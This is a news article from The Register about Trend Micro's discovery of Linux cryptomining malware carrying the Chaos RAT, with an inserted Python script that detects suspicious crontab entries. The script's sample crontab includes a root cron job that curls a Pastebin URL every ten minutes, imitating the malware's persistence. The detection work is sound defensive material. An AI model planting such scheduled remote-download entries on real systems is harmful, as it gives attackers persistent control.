Researchers smell a crypto mining chaos RAT targeting Linux • The Register

A type of cryptomining malware targeting Linux-based systems has gained additional capabilities by integrating an open source remote access trojan called Chaos RAT, which has several advanced features that attackers can use to control remote operating systems.

Trend Micro security researchers discovered the threat last month. Like previous similar versions of the miner, which also target Linux operating systems, the code kills competing malware and resources that hamper cryptocurrency mining performance.

The newer malware then creates persistence “by changing the /etc/crontab file, a UNIX scheduler, which in this case downloads itself from Pastebin every 10 minutes,” wrote Trend Micro researchers David Fiser and Alfredo Oliveira.
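As an added illustration (not code from Trend Micro or The Register), the following sketch checks /etc/crontab-style text for the persistence pattern described above: an entry that downloads from Pastebin, or that downloads on a short timer. The host list, the 15-minute threshold and the sample crontab are assumptions constructed for this example.

```python
import re

# Assumptions of this added example, not values from the Trend Micro report:
PASTE_HOSTS = {"pastebin.com"}   # the article names Pastebin; extend as needed
MAX_INTERVAL_MIN = 15            # "every 10 minutes" falls under this threshold
FETCH = re.compile(r"\b(curl|wget)\b")
URL_HOST = re.compile(r"https?://([^/\s'\"|;:]+)", re.I)
ENV_LINE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_system_crontab(text):
    """Yield (time_field, user, command) from /etc/crontab-style text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue                        # blanks, comments, SHELL=/PATH= lines
        n = 2 if line.startswith("@") else 6   # "@hourly user cmd" vs 5 time fields
        parts = line.split(None, n)
        if len(parts) == n + 1:
            yield parts[0], parts[-2], parts[-1]

def interval_minutes(minute_field):
    """Minutes between runs judged from the minute field alone, else None."""
    m = re.fullmatch(r"\*(?:/([1-9]\d*))?", minute_field)
    return int(m.group(1) or 1) if m else None

def suspicious_entries(text):
    """Flag entries that fetch from a paste site or fetch on a short timer."""
    findings = []
    for minute, user, cmd in parse_system_crontab(text):
        if not FETCH.search(cmd):
            continue
        reasons = []
        if {h.lower() for h in URL_HOST.findall(cmd)} & PASTE_HOSTS:
            reasons.append("downloads from a paste site")
        every = interval_minutes(minute)
        if every is not None and every <= MAX_INTERVAL_MIN:
            reasons.append(f"runs every {every} min")
        if reasons:
            findings.append({"user": user, "command": cmd, "reasons": reasons})
    return findings

# Constructed sample, not taken from an infected host; EXAMPLE is a placeholder.
SAMPLE = """\
SHELL=/bin/sh
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root  curl -fsSL https://pastebin.com/raw/EXAMPLE -o /tmp/EXAMPLE
0 3 * * 0    backup wget -q https://mirror.example.org/keys.gpg -O /tmp/keys.gpg
"""
```

Running `suspicious_entries(open("/etc/crontab").read())` on a host returns only the entries worth a manual look; the weekly `wget` job in the sample is not flagged because it neither uses a paste site nor runs on a short interval.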

After that, it downloads an XMRig miner, a configuration file, another payload that continuously kills competing malware, and the Chaos RAT (Remote Access Tool), which is written in Go and has a ton of features, including restarting and shutting down the victim's computer.

In addition, the open-source tool can run a reverse shell on the infected system, take screenshots of the victim’s device, collect information about the operating system, and download, upload, or even delete files.

“An interesting feature of the malware family we intercepted is that the address and access token are passed as compilation flags and hard-coded in the RAT client, replacing all data in variables from the main code,” the researchers wrote.

They also noted that the main server used to download payloads appears to be located in Russia, while the Chaos RAT connects to another command-and-control server believed to be located in Hong Kong.

It is worth noting that the Russian server was also used for bulletproof cloud hosting – infrastructure services, provided by other shady characters, that criminals can use to launch and usually hide their cyberattacks and other illegal activities. According to Trend Micro researchers, other cybercriminals have used the same hosting service for their attacks on cloud infrastructure, containers, and Linux servers.

“On the surface, the inclusion of a RAT in the infection routine of a cryptocurrency mining malware may seem relatively insignificant,” said Fiser and Oliveira.

“However, given the richness of the tool’s capabilities and the fact that this development shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals remain extra vigilant when it comes to security,” they continued. ®

https://www.theregister.com/2022/12/13/cryptoming_chaos_rat_targets_linux/

Rick Schindler
